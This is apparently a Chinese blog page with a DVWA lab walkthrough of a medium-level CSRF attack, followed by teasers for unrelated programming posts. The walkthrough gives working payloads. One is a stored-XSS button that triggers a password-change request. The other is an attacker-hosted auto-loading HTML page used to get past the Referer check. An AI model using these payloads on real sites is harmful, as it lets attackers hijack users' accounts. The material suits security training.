当前位置：首页 > news >正文

DVWA—CSRF-Medium跨站请求伪造中级

news 2025/7/6 23:10:40

注意：

1、这里对XSS(Stored)关卡不熟悉的可以从这里去看http://t.csdn.cn/ggQDK

2、把难度设置成 Medium

一、这一关同样我们需要埋下伏笔，诱使用户点击来提交，首先从XSS（Stored）入手。

注意：在前面介绍过如何进行XSS注入，这里就不再讲解。http://t.csdn.cn/gs8xX

二、在上low难度中，我们直接使用<a>标签来包裹修改密码的请求。但这一关<a>标签被过滤了。

所以，我们使用的是button标签来提交修改密码的链接。

<button Onclick="alert(11)">点我</button>

简单查看效果，可以触发

三、接下来是不是就简单了，在这里使用 location.href=“” 来提交类似第一关修改密码的GET请求不就ok?

构造payload：（注意这里的ip是web服务器的ip后面不要混淆）

<button Onclick=location.href="http://192.168.114.165/vulnerabilities/csrf/?password_new=9999&password_conf=9999&Change=Change">拿下</button>

解析：就是当用户点击这个按钮的时候，会自动提交一个修改密码的get请求，来修改当前用户的密码。 No matter who you are!

注入，并查看结果：（经过验证确实在字符串的长度被限制了！）

四、所以果真没那么简单，话不多说直接看答案。

提示：

源码：

用人话是这样说：

1、第一关把整个GET请求藏进去没办法——长度限制

2、需要多个连接来实现——不然怎么叫跨站呢？思路讲就是点击按钮让页面跳转到我在其他服务器（114.199）准备好的一个页面，用这个页面来向114.165服务器来提交GET请求。

3、但是！从源码可以看到，这里有一个referer，比如我们用114.199服务器提交GET请求的时候，referer的ip会是114.199。所以也不会提交成功。

4、所以我们要绕过referer。

五、首先在114.199服务器上面创建一个chage_192.168.114.165.html 的文件,用来绕过referer。这里的IP是靶场的IP。内容如下：

<script>// 向web服务器提交请求 function onlo(){location.href="http://192.168.114.165/vulnerabilities/csrf/?password_new=12581&password_conf=12581&Change=Change";}
</Script>
<body onload="onlo()">

解析：这个就相当于跨站脚本通过，当用户跳转到这个页面，这个页面马上就向Web靶场服务器一个修改密码的请求。来完成密码修改。

六、接下来构造payload

<button Onclick=location.href="http://192.168.114.199/change_192.168.114.165.html">拿下</button>

#注意修改IP地址。href=服务器上部署的那个脚本连接。

埋下伏笔！

单击拿下，抓包查看。

拿下！

DVWA—CSRF-Medium跨站请求伪造中级

注意： 1、这里对XSS(Stored)关卡不熟悉的可以从这里去看http://t.csdn.cn/ggQDK 2、把难度设置成 Medium 一、这一关同样我们需要埋下伏笔，诱使用户点击来提交，首先从XSS（Stored）入手。注意：在前面介绍…...

编程日记 2023/2/10 11:51:54

【电商】后台订单生成

结合商品流转的电商系列介绍了一些了，商品已经采购入库、价格税率设置好了、活动及相关模板也已经准备完毕，下面就应该上架销售了，现在接着聊下订单的生成。订单从产生到最终的关闭需要经历很多的环节，订单也是电商系统的核心数据…...

编程日记 2023/2/10 11:50:48

作为公司，这个5款在线软件工具赶紧安利起来！

2023年了 ，您的企业还没使用在线软件工具吗？自从用了在线工具之后，感觉打开了新办公世界的大门，效率蹭蹭蹭地往上涨啊。对于喜欢追求效率和便捷的我来说，在线实在是太棒了！今天安利几个非常不错的在线软件工…...

编程日记 2023/2/10 11:49:41

class B { public:~B() // 基类析构函数不为虚函数{cout << "B::~B()" << endl;} };class D : public B { public:~D(){cout << "D::~D()" << endl;} };void Test(B* t) {delete t;t nullptr; }int main() {B *pb new B;Test…...

编程日记 2023/2/10 11:48:34

MySQL必会四大函数-时间函数

一、时间日期获取函数获取当前日期（date）函数：curdate() mysql> select curdate(); 2023-02-09 获取当前时间（time）函数：curtime() select curtime(); 08:49:27 获取当前时间戳（date &…...

编程日记 2023/2/10 11:47:30

震惊！邻桌的程序猿做可视化报告竟然比我还快，带着好奇心我打开了他的电脑，发现惊天秘密，原因竟是...

其实，本文就是想分享一个做可视化的捷径！ 制作可视化的方式有千千万。 Excel 控若能轻车熟路驾驭 VBA，能玩出各种花来，再不济借助图表插件外援也能秒杀一众小白选手。会编程的，Echarts 几十行代码，分分…...

编程日记 2023/2/10 11:46:22

mathtype7与word冲突，无法安装，不显示工具栏的问题解决

首先无法安装，或安装出错时，要清理注册表防止以后再次出现该问题，以此记录留作备份。打开注册表的方法是键盘winr键同时按（win就是Alt旁边像窗户图标的键），正常的话会跳出一个叫“运行”的家伙，…...

编程日记 2023/2/10 11:45:15

IBM AIX 升级Openssh 实现篇（编译安装）

升级成功佐证！！！本文所有内容仅作参考，请在测试环境中具体测试完毕后才能应用于生产环境！！！ [1]备份和恢复方案开启telnet 服务，防止ssh 掉线后无法重连维护。在修复漏洞后关闭telnet。备份该服务相关的所有文件，以便恢复。 root@TEST:/etc# vi inetd.conf #ftp…...

编程日记 2023/2/10 11:44:06

linux的睡眠框架及实现

睡眠 4 种模式：S2I (Suspend-to-Idle)： 挂起系统，IO进入低功耗模式。需配置CONFIG_SUSPEND。Standby：执行S2I后，把AP (nonboot CPU) 离线。除了CONFIG_SUSPEND的支持外，还需要向suspend子系统注册&#xff…...

编程日记 2023/2/10 11:42:55

Java面试知识点

工作也有好些年了，从刚毕业到前几年看过无数的面试题，总想着自己写一个面试总结，随着自我认识的变化，一些知识点的理解也越来越不一样了。写下来温故而知新。很多问题可能别人也总结过，但是答案不尽相同，如…...

编程日记 2023/2/10 11:41:50

PTA Advanced 1159 Structure of a Binary Tree C++

目录题目 Input Specification: Output Specification: Sample Input: Sample Output: 思路代码题目 Suppose that all the keys in a binary tree are distinct positive integers. Given the postorder and inorder traversal sequences, a binary tree can be un…...

编程日记 2023/2/10 11:40:45

CDN绕过技术总汇

注本文首发于合天网安实验室首发链接：https://mp.weixin.qq.com/s/9oeUpFUZ_0FUu6YAhQGuAg 近日HVV培训以及面试，有人问了CDN该如何绕过找到目标真实IP，这向来是个老生常谈的问题，而且网上大多都有，但是有些不够全面…...

编程日记 2023/2/10 11:39:40

算法训练营DAY51|300.最长递增子序列、674. 最长连续递增序列、718. 最长重复子数组

本期是求子序列的新的一期，题目前两道有一些相似之处，思路差不多，第三道有一点难度，但并不意味着第一道没有难度，没有做过该类型题的选手，并不容易解出题解。 300. 最长递增子序列 - 力扣（Leet…...

编程日记 2023/2/10 11:38:30

mac：彻底解决-安装应用后提示：无法打开“XXX”，因为无法验证开发者的问题；无法验证此App不包含恶意软件

mac从浏览器或其他电脑接收了应用，但是打开报错目录报错解决办法一次性方法永久解决方法验证恢复应用验证报错截图如下： 错误信息无法打开“XXX”，因为无法验证开发者的问题；无法验证此App不包含恶意软件解决办法一次性方…...

编程日记 2023/2/10 11:37:24

CPU 指标 user/idle/system 说明

从图中看出，一共有五个关于CPU的指标。分别如下： User User表示：CPU一共花了多少比例的时间运行在用户态空间或者说是用户进程(running user space processes)。典型的用户态空间程序有：Shells、数据库、web服务器…… Nice N…...

编程日记 2023/2/10 11:35:10

Thinkphp大型进销存ERP源码/ 进销存APP源码/小程序ERP系统/含VUE源码支持二次开发

框架：ThinkPHP5.0.24 uniapp 包含:服务端php全套开源源码，uniapp前端全套开源源码（可发布H5/android/iod/微信小程序/抖音小程序/支付宝/百度小程序） 注：这个是全开源，随便你怎么开，怎么来&a…...

编程日记 2023/2/10 11:33:59

hgame2023 WebMisc

文章目录Webweek1Classic Childhood GameBecome A MemberGuess Who I AmShow Me Your BeautyWeek2Git Leakagev2boardSearch CommodityDesignerweek3Login To Get My GiftPing To The HostGopher Shopweek4Shared DiaryTell MeMiscweek1Where am I神秘的海报week2Tetris Master…...

编程日记 2023/2/10 11:32:50

注意：